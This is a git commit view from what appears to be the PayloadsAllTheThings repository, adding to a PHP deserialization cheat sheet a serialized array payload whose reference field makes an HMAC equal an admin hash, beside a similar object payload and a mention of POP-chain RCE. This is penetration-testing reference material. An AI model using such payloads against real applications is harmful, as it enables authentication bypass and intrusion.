Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings into master

2024-11-10 23:24:31 +00:00 · 2020-09-27 11:17:33 +02:00 · 2020-09-27 11:17:33 +02:00 · e36ae2458d
commit e36ae2458d
parent 21f2b5dca6 a57305e75f
1 changed files with 7 additions and 1 deletions
--- a/Deserialization/PHP.md
+++ b/Deserialization/PHP.md
@ -111,6 +111,12 @@ Payload:
 O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
 ```

+We can do an array to like this:
+
+```php
+a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
+```
+
 ## Finding and using gadgets

 Also called "PHP POP Chains", they can be used to gain RCE on the system.
@ -193,4 +199,4 @@ $poc->stopBuffering();
 * [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
 * [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
 * [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
-* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
+* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)